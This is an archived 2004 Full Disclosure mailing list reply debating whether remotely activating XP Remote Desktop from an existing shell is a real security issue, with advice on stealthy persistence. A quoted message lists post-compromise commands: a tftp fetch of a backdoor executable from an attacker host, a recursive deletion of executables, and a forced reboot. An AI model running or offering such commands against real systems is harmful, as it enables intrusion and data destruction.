Full Disclosure mailing list archives

Re: XP Remote Desktop Remote Activation

From: "Joel R. Helgeson" <joel () helgeson com>
Date: Sat, 2 Oct 2004 12:49:57 -0500

If someone installs a backdoor, that can be detected by AV scanner. If yougain temporary shell, open up the management interface, you'll have fullcontrol of the box without anyone becoming the wiser.


Joel R. Helgeson
Director of Networking & Security Services
SymetriQ Corporation

"Give a man fire, and he'll be warm for a day; set a man on fire, and he'llbe warm for the rest of his life."----- Original Message -----From: "morning_wood" <se_cur_ity () hotmail com>

To: "Fixer" <fixer907 () gmail com>; <full-disclosure () lists netsys com>
Sent: Saturday, October 02, 2004 11:05 AM
Subject: Re: [Full-disclosure] XP Remote Desktop Remote Activation

a malicious user who has already gained a command shell to activate


umm... you already own the box.
try...
tftp -i yourhost get evilbackdoor.exe ( vnc mabey )

or

c:\del *.exe /s
c:\shutdown -r

I realy do not see the SECURITY ISSUE here.


cheers,
m.wood

_______________________________________________
Full-Disclosure - We believe in it.

Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

XP Remote Desktop Remote Activation Fixer (Oct 02)
- Re: XP Remote Desktop Remote Activation morning_wood (Oct 02)
  - Re: XP Remote Desktop Remote Activation Joel R. Helgeson (Oct 02)
- RE: XP Remote Desktop Remote Activation Dominick Baier (Oct 02)
  - Re: XP Remote Desktop Remote Activation Fixer (Oct 02)
- RE: XP Remote Desktop Remote Activation Larry Seltzer (Oct 02)
- Re: XP Remote Desktop Remote Activation H D Moore (Oct 03)
  - Re: XP Remote Desktop Remote Activation Fixer (Oct 03)
- <Possible follow-ups>
- RE:XP Remote Desktop Remote Activation RandallM (Oct 02)
- Re: XP Remote Desktop Remote Activation Fixer (Oct 02)